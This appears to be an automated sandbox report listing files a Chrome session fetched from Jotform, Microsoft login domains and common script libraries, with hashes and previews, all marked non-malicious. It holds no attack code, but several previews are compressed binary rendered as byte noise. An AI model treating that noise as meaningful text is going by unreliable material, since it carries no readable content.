                                                                                                                                                                                                                                            Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["for-csa-timeout"]=t():e["for-csa-timeout"]=t()}(this,function(){return function(){var e={23715:function(e,t,r){var n=r(56037),o=r(37609),i=r(29391),s=r(94191),a=r(42721);function l(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}l.prototype.clear=n,l.prototype.delete=o,l.prototype.get=i,l.prototype.has=s,l.prototype.set=a,e.exports=l},56629:function(e,t,r){var n=r(1171),o=r(67838),i=r(44859),s=r(4073),a=r(28541);function l(e){var t=-1,r=null==e?0:e.length;for(this.clear();++t<r;){var n=e[t];this.set(n[0],n[1])}}l.prototype.clear=n,l.prototype.delete=o,l.prototype.get=i,l.prototype.has=s,l.prototype.set=a,e.exports=l},91739:function(e,t,r){var n=r(83743)(r(92373),"Map");e.exports=n},10503:function(e,t,r){var n=r(73649),o=r(91186),i=r(59713),s=r(21431),a=r(36801);function l(e){var
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46777)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):47148
                                                                                                                                                                                                                                            Entropy (8bit):5.629910261811663
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:Qiju849rhoB+vWxDCgkFCEeqde3oiHbj5XyG3effPd7IIloF16Tz:hKby07equbZyNPwC
                                                                                                                                                                                                                                            MD5:C45AC812E8A964E34C70F49737398BC7
                                                                                                                                                                                                                                            SHA1:A583D170D4D74A80FEE3601F1C1E3782DBD7950B
                                                                                                                                                                                                                                            SHA-256:81916633A0086A6FE8052ED18F8855FB4580BCE9C89D7651A580F99A63C1B4BB
                                                                                                                                                                                                                                            SHA-512:8222F9A56F134531D7CFE8A32DA8ABE804ED2A6FA8776783214991EACE55098F2795A5365001937A553654C5F36F12120E8FFC943FD981725D9E1BD20B054676
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="bcfffebb-2d53-56d4-a7f1-6ed5d3ebc2d2")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["3186"],{91661:function(e,t,_){_.d(t,{Z:function(){return M}});var r=_("41663"),n=_("80557"),a=_("93565"),o=_("94653"),i=_("37897"),c=_("11268"),s=_("32358"),l=_("50728"),m=_("65301"),p=_("31157"),E=_("53235"),u=_("10504"),d=_("89544"),A=_("45615"),O=_("53075");var R=({isEnabled:e=!1,user:t=null}={})=>{const[_,r]=(0,i.useState)(!1);return(0,i.useEffect)((()=>{if(!e||!(0,A.BB)()||!t||_)return;const n=e=>{"load"===e.type&&r(!0)},a=document.createElement("script");return a.id="hs-script-loader",a.type="application/javascript",a.src="//js.hs-scripts.com/4773329.js",a.async=!0,a.defer=!0,document.body.appendChil
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1435
                                                                                                                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116345
                                                                                                                                                                                                                                            Entropy (8bit):7.997378915283506
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                                                                                                                            MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                                                                                                                            SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                                                                                                                            SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                                                                                                                            SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):146238
                                                                                                                                                                                                                                            Entropy (8bit):7.95809560989995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:H8tCig7NFh9nu/eMAvAq5K37BRV5aJMIsk4y+VS1/lS/b2WNxy/NG6dXHnE:H8tbCNFhFAq5KrTrLI1b6m9S/b2WN0/o
                                                                                                                                                                                                                                            MD5:101970D9D8BCD64F29FC00572E3C1DF3
                                                                                                                                                                                                                                            SHA1:9CFD771CA6FFCF8BC5A04524BE37A227DD5CB3A2
                                                                                                                                                                                                                                            SHA-256:1C337234A0FBF9A0B6DD3D0BCD7C714A1B7D8D48C5EBD030569EA11303A7C91A
                                                                                                                                                                                                                                            SHA-512:66DF4E307BB7B7355AC8C81D9E57F65EFB4589A62936081DEF32501650584D62CD0F04818503A2A0708F8EA986D78000C632D2A3082E611D3FCE0E15B8CFBE56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=WCrTkI0L9lPxBmDI1lEqmg&expires=1736512594
                                                                                                                                                                                                                                            Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 3219 >>.stream.x..ZY..9.~._!{.z.....n...<..........1.`{..|yI...c ..NU..T*.L.'.....}..._..._>.)...{r9..#....9.G.^.w.._...2t.....%.a....zZ>.."P.C\...Q.=H..=....G....'...~.}rSv.sip~q.?......M.}..P9a/.1.....`...,yg....p.O...C.2.._........_.KS.a...u.'..p.`..;w.b..?.?. ...6..c..../.. I..khr..O.X......n.....<..#...{.M@..n\.^...|...~.....>.$..#MS....A7..I..W........+<....<..u.s.?../.K.....P..=....`...v.^.3..3. r....J.^.....#.:..-...&h.S?-...3..v8wp.?..}.|...7q.r|Y.>....s+..H.....+Z1....L..1......... .Va...>.S..0..W..A...t}....G...'.2x.w..k..w.<.3.....~..Qu{..&E..I..9. .z.z.s...#...&-.wE...o2....... ....qtb9.J....M.aC. .78.....)'Q...=+..r..O^r......GT8.h.3...ls.8.J...F..H.n).....^<...r.n...].............Fh(..q...7y.9d&.c?Q.8=!.2HA..H]b..!WQ...k.......B..h3y.....W.O1Q..m5.o.M.QV...M.?...X...(lR>p-#...`.4.9.... .8/.e...W...O..o9x+..Lr.Jr...L.[.6.]..O.....)M..2.$\.e.t..-....~...0..48..B.6.@H.h...H
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):2813454
                                                                                                                                                                                                                                            Entropy (8bit):5.025469980667826
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:7AnSxHLYqLJpYB7SXe/IOLsBCuCIhviiCIyQ2HxPTARkLNegfxvjni:zJ
                                                                                                                                                                                                                                            MD5:C46D7D8F56170A6D8F5A410C401BCCF5
                                                                                                                                                                                                                                            SHA1:E72E72E4AA55CF9492AA8B1D0CD42E796B874E56
                                                                                                                                                                                                                                            SHA-256:86B36FC48609CC2FAEEBCD83A3AF8798FBC60D2F9DDEE17D82BAFC3CA7DE3D1A
                                                                                                                                                                                                                                            SHA-512:4C0DA2BC6FB955C542BCD115CDA96B5FF9D4561F111661A69DB82D4F4451E885BA57B123530EF7868B9E4DF05C31098AA4FC5A7BEA4495382D1E961FFA754E96
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn01.jotfor.ms/s/vendor/static/pdfjs-dist/2.14.305/pdf.worker.js
                                                                                                                                                                                                                                            Preview:/**. * @licstart The following is the entire license notice for the. * JavaScript code in this page. *. * Copyright 2022 Mozilla Foundation. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. *. * @licend The above is the entire license notice for the. * JavaScript code in this page. */..(function webpackUniversalModuleDefinition(root, factory) {..if(typeof exports === 'object' && typeof module === 'object')...module.exports = factory();..else if(typeof define === 'function' && define.amd
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (15296)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):3551601
                                                                                                                                                                                                                                            Entropy (8bit):5.683980405460708
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:6bdZzWis0XrDcJVlg4bUTCXAbmIWOdr6kq4vXyOv164ax2VF:wzKOp62
                                                                                                                                                                                                                                            MD5:CFBD9668B652A0B7EF999724288BF504
                                                                                                                                                                                                                                            SHA1:4615829A04D21D15D156793542CC37A1F06C71FE
                                                                                                                                                                                                                                            SHA-256:7E169E65B2E22988F9388F368D2DE1DF504A5BFA1FBC9FC055897AB24AD7C6A7
                                                                                                                                                                                                                                            SHA-512:1ED6CD79BD974C112835BFAB215CF0BA8089DC079573A3E5573278194C11FA76638E3B7539E3F190C91D33C6158052665DC07374A6EBE6E175B72B41EF762695
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn02.jotfor.ms/s/portal/674ac14411e/static/js/index.f047cc75.js
                                                                                                                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e356b656-d5b7-50c1-bc53-6b1559b159dc")}catch(e){}}();.(function(){var __webpack_modules__={88214:function(){},54354:function(){},58501:function(e,t,n){"use strict";n.d(t,{Z:function(){return g}});var o=n("94653"),a=n("37897"),r=n("11268"),i=n("27219"),l=n("60518"),s=n("99216"),c=n("42695"),d=n("11759"),u=n("65964");var p=d.ZP.div`. ${u.z}. border-radius: 10px;. ${({isSVG:e,bgColor:t})=>e?`background: ${t};`:""}. margin-bottom: 5px;.. .jfIconSVG-wrapper {. display: flex;. }.`,m=n("96757"),h=n("45050");const f=({withBorder:e})=>{const{appIconType:t,appIconBackground:n,appIconColor:a,appIconSvgRef:r,appIconURL:d,installableIconURL:u}=(0,i.v9)(h.Z.getAppIconProperties),f=(0,i.v9)(h.Z.getAppTitle),g=(0,i.v9)(h.Z.getAppVersionSelector),y=(0,i.v9)(h.Z.getLogoProperties),v=p,C
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):6376
                                                                                                                                                                                                                                            Entropy (8bit):5.422774271094704
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:umIMhfs7bgKIjC4mxOZB/Gv8kURyciQc4vk/vXdLq97DMlmDeM8423TvN0G+O2Ft:aMe7UDu4mxOD/7nycFuHXwtmmCMZyM1
                                                                                                                                                                                                                                            MD5:EBC9F7B2083E930685A7BD68E8A9B982
                                                                                                                                                                                                                                            SHA1:1E6AB75B5C148463880615D9817CF5AD21A2CF87
                                                                                                                                                                                                                                            SHA-256:D74F3CA658E149F3E233094CAC69E619F6F544A13A291B96BBB28E62191C3CB2
                                                                                                                                                                                                                                            SHA-512:8E478F94822EFE60D04BD047C0234FF3EE97F85DB442D8CAE600E3EB1980430DC364FC358EF06D8420E1A43D567E0CBE508C12ECA06D0B6283D9AF5DF09D1CB6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn02.jotfor.ms/s/vendor/static/pwacompat/2.0.11/pwacompat.min.js
                                                                                                                                                                                                                                            Preview:function S(n){var r=0;return function(){return r<n.length?{done:!1,value:n[r++]}:{done:!0}}}function T(n){var r="undefined"!=typeof Symbol&&Symbol.iterator&&n[Symbol.iterator];return r?r.call(n):{next:S(n)}}function U(n){for(var r,y=[];!(r=n.next()).done;)y.push(r.value);return y}.(function(){function n(a,b){a="__pwacompat_"+a;void 0!==b&&(z[a]=b);return z[a]}function r(){var a=(A=document.head.querySelector('link[rel="manifest"]'))?A.href:"";if(!a)throw'can\'t find <link rel="manifest" href=".." />\'';var b=y([a,window.location]),e=n("manifest");if(e)try{var g=JSON.parse(e);H(g,b)}catch(u){console.warn("PWACompat error",u)}else{var p=new XMLHttpRequest;p.open("GET",a);p.withCredentials="use-credentials"===A.getAttribute("crossorigin");p.onload=function(){try{var u=JSON.parse(p.responseText);.n("manifest",p.responseText);H(u,b)}catch(v){console.warn("PWACompat error",v)}};p.send(null)}}function y(a){for(var b={},e=0;e<a.length;b={c:b.c},++e){b.c=a[e];try{return new URL("",b.c),function
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49911
                                                                                                                                                                                                                                            Entropy (8bit):7.994516776763163
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                                                                                                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                                                                                                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                                                                                                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                                                                                                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):523
                                                                                                                                                                                                                                            Entropy (8bit):5.400597195610864
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:EuvCjvCoHUI7lU4I7IvUI51gDGH4LOaOvCaKfuSdOBMPNw7DOBMy:7Q1HUI7/I7IvUIbgqHHVvCa2uSggNEOh
                                                                                                                                                                                                                                            MD5:B1D1C4C5BF1BB759C4CA1D51F6F46074
                                                                                                                                                                                                                                            SHA1:4888B84607D96D2625FB26F8E0BBAE0196C36583
                                                                                                                                                                                                                                            SHA-256:0D1A937337A44BCFCBFE757DD01C2564BEA02C19A52F617475F3CEC3472E6526
                                                                                                                                                                                                                                            SHA-512:18C415CC522A05BED69278E3CA8AB08C8BB721B348E7054250D276798C697437C73C7722178AB0F34045C560A2DA252314F7381478B88472F260A08FB0BCA1EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:"use strict";(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["7222"],{92976:function(){},43911:function(){},48200:function(){},79560:function(){}}]);.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dff5124c-9e72-5657-a2cc-d1312ab6f742")}catch(e){}}();.//# debugId=dff5124c-9e72-5657-a2cc-d1312ab6f742.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):3452
                                                                                                                                                                                                                                            Entropy (8bit):5.117912766689607
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):16378
                                                                                                                                                                                                                                            Entropy (8bit):7.986541062710992
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                                                                                                                                                                                            MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                                                                                                                                                                                            SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                                                                                                                                                                                            SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                                                                                                                                                                                            SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                                                                                                                                                                                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                                                            Encrypted:false
